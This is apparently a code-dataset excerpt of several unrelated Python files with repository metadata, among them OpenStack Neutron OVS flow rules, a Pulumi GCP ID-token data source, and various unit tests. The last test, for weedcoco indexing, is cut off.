cinema_xpath = '//div[@id="theater"]//a'
cinema_site_xpath = '//th[text()="公式サイト"]/..//a/text()'
screen_text_xpath = '//th[text()="座席"]/..//li/text()'
screen_pattern = r"^\[?(.*?)(\] )?客席数 (.+)$"
screen_name_pattern = r"\1"
seat_number_pattern = r"\3"
def adjust_cinema_url(self, url):
"""
adjust cinema page's url if needed
"""
return url + "/info/"
| 30.222222 | 66 | 0.598039 |
311410c80a974846f30f371dd812b452cfdfd099 | 834 | py | Python | tests/test_network.py | horpto/phone-iso3166 | 09d6bb8cf69bc0dffb97677924aa3318b579f030 | [
"MIT"
] | 19 | 2017-03-28T10:35:22.000Z | 2022-03-14T04:39:03.000Z | tests/test_network.py | horpto/phone-iso3166 | 09d6bb8cf69bc0dffb97677924aa3318b579f030 | [
"MIT"
] | 17 | 2016-11-11T11:50:57.000Z | 2021-06-22T09:32:17.000Z | tests/test_network.py | horpto/phone-iso3166 | 09d6bb8cf69bc0dffb97677924aa3318b579f030 | [
"MIT"
] | 5 | 2015-09-28T18:25:38.000Z | 2021-07-05T11:57:58.000Z | from phone_iso3166.network import network, country_networks
from phone_iso3166.errors import InvalidNetwork, InvalidCountry
import pytest
def test_network():
c, n = network(238, 1)
assert c == 'DK'
assert n == 'TDC A/S'
c, n = network(238, 2)
assert c == 'DK'
assert n == 'Telenor Denmark'
c, n = network(425, 6)
assert c == 'PS'
assert n == 'Wataniya Palestine Mobile Telecommunications Company'
def test_country_networks():
nets = country_networks('US')
for n in nets:
mcc, mnc, name0 = n
c, name1 = network(mcc, mnc)
assert c == 'US'
assert name0 == name1
def test_invalid_country():
with pytest.raises(InvalidCountry):
country_networks('XX')
def test_invalid_network():
with pytest.raises(InvalidNetwork):
network(0, 0)
| 22.540541 | 70 | 0.642686 |
40e4632d5779dce44c1d9dd5543d9499b88f9de2 | 512 | py | Python | pysal/explore/segregation/tests/test_atkinson.py | ocefpaf/pysal | 7e397bdb4c22d4e2442b4ee88bcd691d2421651d | [
"BSD-3-Clause"
] | 1 | 2021-08-16T02:47:35.000Z | 2021-08-16T02:47:35.000Z | pysal/explore/segregation/tests/test_atkinson.py | ocefpaf/pysal | 7e397bdb4c22d4e2442b4ee88bcd691d2421651d | [
"BSD-3-Clause"
] | null | null | null | pysal/explore/segregation/tests/test_atkinson.py | ocefpaf/pysal | 7e397bdb4c22d4e2442b4ee88bcd691d2421651d | [
"BSD-3-Clause"
] | null | null | null | import unittest
import pysal.lib
import geopandas as gpd
import numpy as np
from pysal.explore.segregation.aspatial import Atkinson
class Atkinson_Tester(unittest.TestCase):
def test_Atkinson(self):
s_map = gpd.read_file(pysal.lib.examples.get_path("sacramentot2.shp"))
df = s_map[['geometry', 'HISP_', 'TOT_POP']]
index = Atkinson(df, 'HISP_', 'TOT_POP')
np.testing.assert_almost_equal(index.statistic, 0.15079259382667654)
if __name__ == '__main__':
unittest.main()
| 28.444444 | 78 | 0.71875 |
7088e9a6165ff2359d6eeb299deb8df60e7868ec | 2,234 | py | Python | tests/python/gaia-ui-tests/gaiatest/tests/functional/gallery/test_gallery_switch_to_camera.py | marshall/gaia | 00722269f5d559595fd2f79d9dd70310758af08c | [
"Apache-2.0"
] | 1 | 2019-02-13T23:44:14.000Z | 2019-02-13T23:44:14.000Z | tests/python/gaia-ui-tests/gaiatest/tests/functional/gallery/test_gallery_switch_to_camera.py | marshall/gaia | 00722269f5d559595fd2f79d9dd70310758af08c | [
"Apache-2.0"
] | null | null | null | tests/python/gaia-ui-tests/gaiatest/tests/functional/gallery/test_gallery_switch_to_camera.py | marshall/gaia | 00722269f5d559595fd2f79d9dd70310758af08c | [
"Apache-2.0"
] | null | null | null | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
try:
from marionette import Wait
except:
from marionette_driver import Wait
from gaiatest import GaiaTestCase
from gaiatest.apps.gallery.app import Gallery
from gaiatest.apps.camera.app import ImagePreview
class TestGallery(GaiaTestCase):
def setUp(self):
GaiaTestCase.setUp(self)
self.apps.set_permission('Camera', 'geolocation', 'deny')
self.push_resource('IMG_0001.jpg')
def test_gallery_switch_to_camera(self):
"""
https://moztrap.mozilla.org/manage/case/3620/
"""
gallery = Gallery(self.marionette)
gallery.launch()
gallery.wait_for_files_to_load(1)
# Enter the single photo view
image = gallery.tap_first_gallery_item()
self.assertIsNotNone(image.current_image_source)
# Check that there are 5 options displayed beneath the picture
self.assertEqual(len(image.photo_toolbar_options), 5)
# Tap on the Camera button to go to the Camera app
self.previous_number_of_pictures = len(self.data_layer.picture_files)
self.camera = image.tap_switch_to_camera()
# Take a picture and verify the picture is taken
self.camera.take_photo()
# Check that picture saved to SD card
Wait(self.marionette).until(lambda m: len(self.data_layer.picture_files) ==
self.previous_number_of_pictures + 1)
# Open Preview, tap the option icon and select Gallery app
self.camera.tap_thumbnail()
self.preview = ImagePreview(self.marionette)
self.preview.tap_switch_to_gallery()
# Verify the Gallery app is now open, with one more file
gallery.wait_for_files_to_load(2)
new_image = gallery.tap_first_gallery_item()
# verify the new first image is not same as the previous (and only) first image,
# meaning that the new image is shown on the top of the gallery app grid
self.assertFalse(new_image.current_image_source is image.current_image_source)
| 36.622951 | 88 | 0.690689 |
44964e4684f169404a501c81942100c1ece96411 | 14,468 | py | Python | neutron/plugins/ml2/drivers/openvswitch/agent/openflow/native/br_int.py | 1pintbeer/neutron | f5a827c2be06f24a1f8025f120f16c12eb1b1f55 | [
"Apache-2.0"
] | null | null | null | neutron/plugins/ml2/drivers/openvswitch/agent/openflow/native/br_int.py | 1pintbeer/neutron | f5a827c2be06f24a1f8025f120f16c12eb1b1f55 | [
"Apache-2.0"
] | null | null | null | neutron/plugins/ml2/drivers/openvswitch/agent/openflow/native/br_int.py | 1pintbeer/neutron | f5a827c2be06f24a1f8025f120f16c12eb1b1f55 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2014,2015 VA Linux Systems Japan K.K.
# Copyright (C) 2014,2015 YAMAMOTO Takashi <yamamoto at valinux co jp>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
* references
** OVS agent https://wiki.openstack.org/wiki/Ovs-flow-logic
"""
import netaddr
from neutron_lib import constants as p_const
from os_ken.lib.packet import ether_types
from os_ken.lib.packet import icmpv6
from os_ken.lib.packet import in_proto
from oslo_log import log as logging
from neutron.plugins.ml2.drivers.openvswitch.agent.common import constants
from neutron.plugins.ml2.drivers.openvswitch.agent.openflow.native \
import ovs_bridge
LOG = logging.getLogger(__name__)
class OVSIntegrationBridge(ovs_bridge.OVSAgentBridge):
"""openvswitch agent br-int specific logic."""
of_tables = constants.INT_BR_ALL_TABLES
def setup_default_table(self):
self.setup_canary_table()
self.install_goto(dest_table_id=constants.TRANSIENT_TABLE)
self.install_normal(table_id=constants.TRANSIENT_TABLE, priority=3)
self.install_drop(table_id=constants.ARP_SPOOF_TABLE)
self.install_drop(table_id=constants.LOCAL_SWITCHING,
priority=constants.OPENFLOW_MAX_PRIORITY,
vlan_vid=constants.DEAD_VLAN_TAG)
def setup_canary_table(self):
self.install_drop(constants.CANARY_TABLE)
def check_canary_table(self):
try:
flows = self.dump_flows(constants.CANARY_TABLE)
except RuntimeError:
LOG.exception("Failed to communicate with the switch")
return constants.OVS_DEAD
return constants.OVS_NORMAL if flows else constants.OVS_RESTARTED
@staticmethod
def _local_vlan_match(_ofp, ofpp, port, vlan_vid):
return ofpp.OFPMatch(in_port=port, vlan_vid=vlan_vid)
def provision_local_vlan(self, port, lvid, segmentation_id):
(_dp, ofp, ofpp) = self._get_dp()
if segmentation_id is None:
vlan_vid = ofp.OFPVID_NONE
actions = [ofpp.OFPActionPushVlan()]
else:
vlan_vid = segmentation_id | ofp.OFPVID_PRESENT
actions = []
match = self._local_vlan_match(ofp, ofpp, port, vlan_vid)
actions += [
ofpp.OFPActionSetField(vlan_vid=lvid | ofp.OFPVID_PRESENT),
]
instructions = [
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions),
ofpp.OFPInstructionGotoTable(table_id=constants.TRANSIENT_TABLE),
]
self.install_instructions(
instructions=instructions,
priority=3,
match=match,
)
def reclaim_local_vlan(self, port, segmentation_id):
(_dp, ofp, ofpp) = self._get_dp()
if segmentation_id is None:
vlan_vid = ofp.OFPVID_NONE
else:
vlan_vid = segmentation_id | ofp.OFPVID_PRESENT
match = self._local_vlan_match(ofp, ofpp, port, vlan_vid)
self.uninstall_flows(match=match)
@staticmethod
def _arp_dvr_dst_mac_match(ofp, ofpp, vlan, dvr_mac):
# If eth_dst is equal to the dvr mac of this host, then
# flag it as matched.
return ofpp.OFPMatch(vlan_vid=vlan | ofp.OFPVID_PRESENT,
eth_dst=dvr_mac)
@staticmethod
def _dvr_dst_mac_table_id(network_type):
if network_type == p_const.TYPE_VLAN:
return constants.ARP_DVR_MAC_TO_DST_MAC_VLAN
else:
return constants.ARP_DVR_MAC_TO_DST_MAC
def install_dvr_dst_mac_for_arp(self, network_type,
vlan_tag, gateway_mac, dvr_mac, rtr_port):
table_id = self._dvr_dst_mac_table_id(network_type)
# Match the destination MAC with the DVR MAC
(_dp, ofp, ofpp) = self._get_dp()
match = self._arp_dvr_dst_mac_match(ofp, ofpp, vlan_tag, dvr_mac)
# Incoming packet will come with destination MAC of DVR host MAC from
# the ARP Responder. The Source MAC in this case will have the source
# MAC of the port MAC that responded from the ARP responder.
# So just remove the DVR host MAC from the 'eth_dst' and replace it
# with the gateway-mac. The packet should end up in the right the table
# for the packet to reach the router interface.
actions = [
ofpp.OFPActionSetField(eth_dst=gateway_mac),
ofpp.OFPActionPopVlan(),
ofpp.OFPActionOutput(rtr_port, 0)
]
self.install_apply_actions(table_id=table_id,
priority=5,
match=match,
actions=actions)
@staticmethod
def _dvr_to_src_mac_match(ofp, ofpp, vlan_tag, dst_mac):
return ofpp.OFPMatch(vlan_vid=vlan_tag | ofp.OFPVID_PRESENT,
eth_dst=dst_mac)
@staticmethod
def _dvr_to_src_mac_table_id(network_type):
if network_type == p_const.TYPE_VLAN:
return constants.DVR_TO_SRC_MAC_VLAN
else:
return constants.DVR_TO_SRC_MAC
def install_dvr_to_src_mac(self, network_type,
vlan_tag, gateway_mac, dst_mac, dst_port):
table_id = self._dvr_to_src_mac_table_id(network_type)
(_dp, ofp, ofpp) = self._get_dp()
match = self._dvr_to_src_mac_match(ofp, ofpp,
vlan_tag=vlan_tag, dst_mac=dst_mac)
actions = [
ofpp.OFPActionSetField(eth_src=gateway_mac),
]
instructions = [
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions),
ofpp.OFPInstructionGotoTable(table_id=constants.TRANSIENT_TABLE),
]
self.install_instructions(table_id=table_id,
priority=4,
match=match,
instructions=instructions)
actions = [
ofpp.OFPActionPopVlan(),
ofpp.OFPActionOutput(dst_port, 0),
]
self.install_apply_actions(table_id=constants.TRANSIENT_TABLE,
priority=4,
match=match,
actions=actions)
def delete_dvr_to_src_mac(self, network_type, vlan_tag, dst_mac):
table_id = self._dvr_to_src_mac_table_id(network_type)
(_dp, ofp, ofpp) = self._get_dp()
match = self._dvr_to_src_mac_match(ofp, ofpp,
vlan_tag=vlan_tag, dst_mac=dst_mac)
for table in (table_id, constants.TRANSIENT_TABLE):
self.uninstall_flows(
strict=True, priority=4, table_id=table, match=match)
def add_dvr_mac_vlan(self, mac, port):
self.install_goto(table_id=constants.LOCAL_SWITCHING,
priority=4,
in_port=port,
eth_src=mac,
dest_table_id=constants.DVR_TO_SRC_MAC_VLAN)
def remove_dvr_mac_vlan(self, mac):
# REVISIT(yamamoto): match in_port as well?
self.uninstall_flows(table_id=constants.LOCAL_SWITCHING,
eth_src=mac)
def add_dvr_mac_tun(self, mac, port):
self.install_goto(table_id=constants.LOCAL_SWITCHING,
priority=2,
in_port=port,
eth_src=mac,
dest_table_id=constants.DVR_TO_SRC_MAC)
def remove_dvr_mac_tun(self, mac, port):
self.uninstall_flows(table_id=constants.LOCAL_SWITCHING,
in_port=port, eth_src=mac)
def delete_dvr_dst_mac_for_arp(self, network_type,
vlan_tag, gateway_mac, dvr_mac, rtr_port):
table_id = self._dvr_to_src_mac_table_id(network_type)
(_dp, ofp, ofpp) = self._get_dp()
match = self._arp_dvr_dst_mac_match(ofp, ofpp, vlan_tag, dvr_mac)
self.uninstall_flows(
strict=True, priority=5, table_id=table_id, match=match)
def add_dvr_gateway_mac_arp_vlan(self, mac, port):
self.install_goto(table_id=constants.LOCAL_SWITCHING,
priority=5,
in_port=port,
eth_dst=mac,
dest_table_id=constants.ARP_DVR_MAC_TO_DST_MAC_VLAN)
def remove_dvr_gateway_mac_arp_vlan(self, mac, port):
self.uninstall_flows(table_id=constants.LOCAL_SWITCHING,
eth_dst=mac)
def add_dvr_gateway_mac_arp_tun(self, mac, port):
self.install_goto(table_id=constants.LOCAL_SWITCHING,
priority=5,
in_port=port,
eth_dst=mac,
dest_table_id=constants.ARP_DVR_MAC_TO_DST_MAC)
def remove_dvr_gateway_mac_arp_tun(self, mac, port):
self.uninstall_flows(table_id=constants.LOCAL_SWITCHING,
eth_dst=mac)
@staticmethod
def _arp_reply_match(ofp, ofpp, port):
return ofpp.OFPMatch(in_port=port,
eth_type=ether_types.ETH_TYPE_ARP)
@staticmethod
def _icmpv6_reply_match(ofp, ofpp, port):
return ofpp.OFPMatch(in_port=port,
eth_type=ether_types.ETH_TYPE_IPV6,
ip_proto=in_proto.IPPROTO_ICMPV6,
icmpv6_type=icmpv6.ND_NEIGHBOR_ADVERT)
def install_icmpv6_na_spoofing_protection(self, port, ip_addresses):
# Allow neighbor advertisements as long as they match addresses
# that actually belong to the port.
for ip in ip_addresses:
masked_ip = self._cidr_to_os_ken(ip)
self.install_goto(
table_id=constants.ARP_SPOOF_TABLE, priority=2,
eth_type=ether_types.ETH_TYPE_IPV6,
ip_proto=in_proto.IPPROTO_ICMPV6,
icmpv6_type=icmpv6.ND_NEIGHBOR_ADVERT,
ipv6_nd_target=masked_ip, in_port=port,
dest_table_id=constants.TRANSIENT_TABLE)
# Now that the rules are ready, direct icmpv6 neighbor advertisement
# traffic from the port into the anti-spoof table.
(_dp, ofp, ofpp) = self._get_dp()
match = self._icmpv6_reply_match(ofp, ofpp, port=port)
self.install_goto(table_id=constants.LOCAL_SWITCHING,
priority=10,
match=match,
dest_table_id=constants.ARP_SPOOF_TABLE)
def set_allowed_macs_for_port(self, port, mac_addresses=None,
allow_all=False):
if allow_all:
self.uninstall_flows(table_id=constants.LOCAL_SWITCHING,
in_port=port)
self.uninstall_flows(table_id=constants.MAC_SPOOF_TABLE,
in_port=port)
return
mac_addresses = mac_addresses or []
for address in mac_addresses:
self.install_goto(
table_id=constants.MAC_SPOOF_TABLE, priority=2,
eth_src=address, in_port=port,
dest_table_id=constants.TRANSIENT_TABLE)
# normalize so we can see if macs are the same
mac_addresses = {netaddr.EUI(mac) for mac in mac_addresses}
flows = self.dump_flows(constants.MAC_SPOOF_TABLE)
for flow in flows:
matches = dict(flow.match.items())
if matches.get('in_port') != port:
continue
if not matches.get('eth_src'):
continue
flow_mac = matches['eth_src']
if netaddr.EUI(flow_mac) not in mac_addresses:
self.uninstall_flows(table_id=constants.MAC_SPOOF_TABLE,
in_port=port, eth_src=flow_mac)
self.install_goto(table_id=constants.LOCAL_SWITCHING,
priority=9, in_port=port,
dest_table_id=constants.MAC_SPOOF_TABLE)
def install_arp_spoofing_protection(self, port, ip_addresses):
# allow ARP replies as long as they match addresses that actually
# belong to the port.
for ip in ip_addresses:
masked_ip = self._cidr_to_os_ken(ip)
self.install_goto(table_id=constants.ARP_SPOOF_TABLE,
priority=2,
eth_type=ether_types.ETH_TYPE_ARP,
arp_spa=masked_ip,
in_port=port,
dest_table_id=constants.MAC_SPOOF_TABLE)
# Now that the rules are ready, direct ARP traffic from the port into
# the anti-spoof table.
# This strategy fails gracefully because OVS versions that can't match
# on ARP headers will just process traffic normally.
(_dp, ofp, ofpp) = self._get_dp()
match = self._arp_reply_match(ofp, ofpp, port=port)
self.install_goto(table_id=constants.LOCAL_SWITCHING,
priority=10,
match=match,
dest_table_id=constants.ARP_SPOOF_TABLE)
def delete_arp_spoofing_protection(self, port):
(_dp, ofp, ofpp) = self._get_dp()
match = self._arp_reply_match(ofp, ofpp, port=port)
self.uninstall_flows(table_id=constants.LOCAL_SWITCHING,
match=match)
match = self._icmpv6_reply_match(ofp, ofpp, port=port)
self.uninstall_flows(table_id=constants.LOCAL_SWITCHING,
match=match)
self.delete_arp_spoofing_allow_rules(port)
def delete_arp_spoofing_allow_rules(self, port):
self.uninstall_flows(table_id=constants.ARP_SPOOF_TABLE,
in_port=port)
| 43.18806 | 79 | 0.612593 |
76f89d6ed21f57f192af8a22823cdc0be00c5b14 | 1,455 | py | Python | src/programy/processors/pre/toupper.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | null | null | null | src/programy/processors/pre/toupper.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | null | null | null | src/programy/processors/pre/toupper.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 4 | 2019-04-01T15:42:23.000Z | 2020-11-05T08:14:27.000Z | """
Copyright (c) 2016-2019 Keith Sterling http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from programy.utils.logging.ylogger import YLogger
from programy.processors.processing import PreProcessor
class ToUpperPreProcessor(PreProcessor):
def __init__(self):
PreProcessor.__init__(self)
def process(self, context, word_string):
YLogger.debug(context, "Making input upper case...")
return word_string.upper()
| 46.935484 | 120 | 0.78488 |
5c6f2643158c5882f235bd6151fbbff18c71463f | 7,997 | py | Python | sdk/python/pulumi_gcp/serviceaccount/get_account_id_token.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/serviceaccount/get_account_id_token.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/serviceaccount/get_account_id_token.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetAccountIdTokenResult',
'AwaitableGetAccountIdTokenResult',
'get_account_id_token',
'get_account_id_token_output',
]
@pulumi.output_type
class GetAccountIdTokenResult:
"""
A collection of values returned by getAccountIdToken.
"""
def __init__(__self__, delegates=None, id=None, id_token=None, include_email=None, target_audience=None, target_service_account=None):
if delegates and not isinstance(delegates, list):
raise TypeError("Expected argument 'delegates' to be a list")
pulumi.set(__self__, "delegates", delegates)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if id_token and not isinstance(id_token, str):
raise TypeError("Expected argument 'id_token' to be a str")
pulumi.set(__self__, "id_token", id_token)
if include_email and not isinstance(include_email, bool):
raise TypeError("Expected argument 'include_email' to be a bool")
pulumi.set(__self__, "include_email", include_email)
if target_audience and not isinstance(target_audience, str):
raise TypeError("Expected argument 'target_audience' to be a str")
pulumi.set(__self__, "target_audience", target_audience)
if target_service_account and not isinstance(target_service_account, str):
raise TypeError("Expected argument 'target_service_account' to be a str")
pulumi.set(__self__, "target_service_account", target_service_account)
@property
@pulumi.getter
def delegates(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "delegates")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="idToken")
def id_token(self) -> str:
"""
The `id_token` representing the new generated identity.
"""
return pulumi.get(self, "id_token")
@property
@pulumi.getter(name="includeEmail")
def include_email(self) -> Optional[bool]:
return pulumi.get(self, "include_email")
@property
@pulumi.getter(name="targetAudience")
def target_audience(self) -> str:
return pulumi.get(self, "target_audience")
@property
@pulumi.getter(name="targetServiceAccount")
def target_service_account(self) -> Optional[str]:
return pulumi.get(self, "target_service_account")
class AwaitableGetAccountIdTokenResult(GetAccountIdTokenResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetAccountIdTokenResult(
delegates=self.delegates,
id=self.id,
id_token=self.id_token,
include_email=self.include_email,
target_audience=self.target_audience,
target_service_account=self.target_service_account)
def get_account_id_token(delegates: Optional[Sequence[str]] = None,
include_email: Optional[bool] = None,
target_audience: Optional[str] = None,
target_service_account: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetAccountIdTokenResult:
"""
This data source provides a Google OpenID Connect (`oidc`) `id_token`. Tokens issued from this data source are typically used to call external services that accept OIDC tokens for authentication (e.g. [Google Cloud Run](https://cloud.google.com/run/docs/authenticating/service-to-service)).
For more information see
[OpenID Connect](https://openid.net/specs/openid-connect-core-1_0.html#IDToken).
## Example Usage
### ServiceAccount JSON Credential File.
`service_account.get_account_id_token` will use the configured provider credentials
### Service Account Impersonation.
`service_account.get_account_access_token` will use background impersonated credentials provided by `service_account.get_account_access_token`.
Note: to use the following, you must grant `target_service_account` the
`roles/iam.serviceAccountTokenCreator` role on itself.
:param Sequence[str] delegates: Delegate chain of approvals needed to perform full impersonation. Specify the fully qualified service account name. Used only when using impersonation mode.
:param bool include_email: Include the verified email in the claim. Used only when using impersonation mode.
:param str target_audience: The audience claim for the `id_token`.
:param str target_service_account: The email of the service account being impersonated. Used only when using impersonation mode.
"""
__args__ = dict()
__args__['delegates'] = delegates
__args__['includeEmail'] = include_email
__args__['targetAudience'] = target_audience
__args__['targetServiceAccount'] = target_service_account
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('gcp:serviceAccount/getAccountIdToken:getAccountIdToken', __args__, opts=opts, typ=GetAccountIdTokenResult).value
return AwaitableGetAccountIdTokenResult(
delegates=__ret__.delegates,
id=__ret__.id,
id_token=__ret__.id_token,
include_email=__ret__.include_email,
target_audience=__ret__.target_audience,
target_service_account=__ret__.target_service_account)
@_utilities.lift_output_func(get_account_id_token)
def get_account_id_token_output(delegates: Optional[pulumi.Input[Optional[Sequence[str]]]] = None,
include_email: Optional[pulumi.Input[Optional[bool]]] = None,
target_audience: Optional[pulumi.Input[str]] = None,
target_service_account: Optional[pulumi.Input[Optional[str]]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetAccountIdTokenResult]:
"""
This data source provides a Google OpenID Connect (`oidc`) `id_token`. Tokens issued from this data source are typically used to call external services that accept OIDC tokens for authentication (e.g. [Google Cloud Run](https://cloud.google.com/run/docs/authenticating/service-to-service)).
For more information see
[OpenID Connect](https://openid.net/specs/openid-connect-core-1_0.html#IDToken).
## Example Usage
### ServiceAccount JSON Credential File.
`service_account.get_account_id_token` will use the configured provider credentials
### Service Account Impersonation.
`service_account.get_account_access_token` will use background impersonated credentials provided by `service_account.get_account_access_token`.
Note: to use the following, you must grant `target_service_account` the
`roles/iam.serviceAccountTokenCreator` role on itself.
:param Sequence[str] delegates: Delegate chain of approvals needed to perform full impersonation. Specify the fully qualified service account name. Used only when using impersonation mode.
:param bool include_email: Include the verified email in the claim. Used only when using impersonation mode.
:param str target_audience: The audience claim for the `id_token`.
:param str target_service_account: The email of the service account being impersonated. Used only when using impersonation mode.
"""
...
| 46.494186 | 295 | 0.706515 |
821a721b64769294520d104af98bcbbc00388599 | 1,147 | py | Python | mojo/public/tools/bindings/pylib/mojom_tests/generate/module_unittest.py | kjthegod/chromium | cf940f7f418436b77e15b1ea23e6fa100ca1c91a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 8 | 2016-02-08T11:59:31.000Z | 2020-05-31T15:19:54.000Z | mojo/public/tools/bindings/pylib/mojom_tests/generate/module_unittest.py | kjthegod/chromium | cf940f7f418436b77e15b1ea23e6fa100ca1c91a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1 | 2021-05-05T11:11:31.000Z | 2021-05-05T11:11:31.000Z | mojo/public/tools/bindings/pylib/mojom_tests/generate/module_unittest.py | kjthegod/chromium | cf940f7f418436b77e15b1ea23e6fa100ca1c91a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 7 | 2016-02-09T09:28:14.000Z | 2020-07-25T19:03:36.000Z | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import imp
import os.path
import sys
import unittest
def _GetDirAbove(dirname):
"""Returns the directory "above" this file containing |dirname| (which must
also be "above" this file)."""
path = os.path.abspath(__file__)
while True:
path, tail = os.path.split(path)
assert tail
if tail == dirname:
return path
try:
imp.find_module("mojom")
except ImportError:
sys.path.append(os.path.join(_GetDirAbove("pylib"), "pylib"))
from mojom.generate import module as mojom
class ModuleTest(unittest.TestCase):
def testNonInterfaceAsInterfaceRequest(self):
"""Tests that a non-interface cannot be used for interface requests."""
module = mojom.Module('test_module', 'test_namespace')
struct = mojom.Struct('TestStruct', module=module)
with self.assertRaises(Exception) as e:
mojom.InterfaceRequest(struct)
self.assertEquals(
e.exception.__str__(),
'Interface request requires \'x:TestStruct\' to be an interface.')
| 30.184211 | 77 | 0.721011 |
d98224a343ca9d1555a85ac8d9620d433b8245cd | 3,132 | py | Python | weedcoco/tests/index/test_indexing.py | Sydney-Informatics-Hub/Weed-ID-Interchange | d27891c2148de54d03727f688f8b6c6c414ec09b | [
"MIT"
] | 14 | 2021-11-29T12:16:59.000Z | 2022-03-20T00:26:10.000Z | weedcoco/tests/index/test_indexing.py | Sydney-Informatics-Hub/Weed-ID-Interchange | d27891c2148de54d03727f688f8b6c6c414ec09b | [
"MIT"
] | 282 | 2020-07-10T00:52:21.000Z | 2021-03-01T06:58:05.000Z | weedcoco/tests/index/test_indexing.py | Sydney-Informatics-Hub/Weed-ID-Interchange | d27891c2148de54d03727f688f8b6c6c414ec09b | [
"MIT"
] | 2 | 2020-10-07T06:12:39.000Z | 2021-02-02T05:21:32.000Z | import pathlib
import pytest
from elasticmock import elasticmock as elasticmock
from weedcoco.index.indexing import main, ElasticSearchIndexer
BASIC_INPUT_PATH = str(
pathlib.Path(__file__).parent.parent
/ "repo"
/ "deposit_data"
/ "basic_1"
/ "weedcoco.json"
)
THUMBNAIL_DIR = "arbitrary-thumbnail-dir"
@elasticmock
def test_smoke_indexing():
# run indexing but check nothing
main(
[
"--weedcoco-path",
BASIC_INPUT_PATH,
"--thumbnail-dir",
THUMBNAIL_DIR,
"--upload-id",
"12345",
]
)
def test_batch_generation():
# TODO
pytest.xfail("Not yet implemented")
def test_task_type():
indexer = ElasticSearchIndexer(
weedcoco_path=BASIC_INPUT_PATH, thumbnail_dir=THUMBNAIL_DIR
)
for entry in indexer.generate_index_entries():
assert isinstance(entry["task_type"], list)
# TODO: test the task type for different input annotation data
# TODO: test for "segmentation": []
pytest.xfail("Not yet implemented")
def test_annotation_and_category():
"Check annotations and categories are correctly indexed with each image"
indexer = ElasticSearchIndexer(
weedcoco_path=BASIC_INPUT_PATH, thumbnail_dir=THUMBNAIL_DIR
)
expected_names = {
0: {"name": "crop: daucus carota", "taxo_names": {"crop: daucus carota"}},
1: {"name": "weed: UNSPECIFIED", "taxo_names": {"weed: UNSPECIFIED", "weed"}},
2: {
"name": "weed: sonchus oleraceus",
"taxo_names": {
"weed: sonchus oleraceus",
"weed: non-poaceae",
"weed: asteraceae",
"weed",
},
},
3: {
"name": "weed: lolium perenne",
"taxo_names": {"weed: lolium perenne", "weed: poaceae", "weed"},
},
}
for entry in indexer.generate_index_entries():
assert entry["annotations"] # TODO: check correct number of annotations
for annotation in entry["annotations"]:
category_id = annotation["category_id"]
assert annotation["category"]["name"] == expected_names[category_id]["name"]
assert (
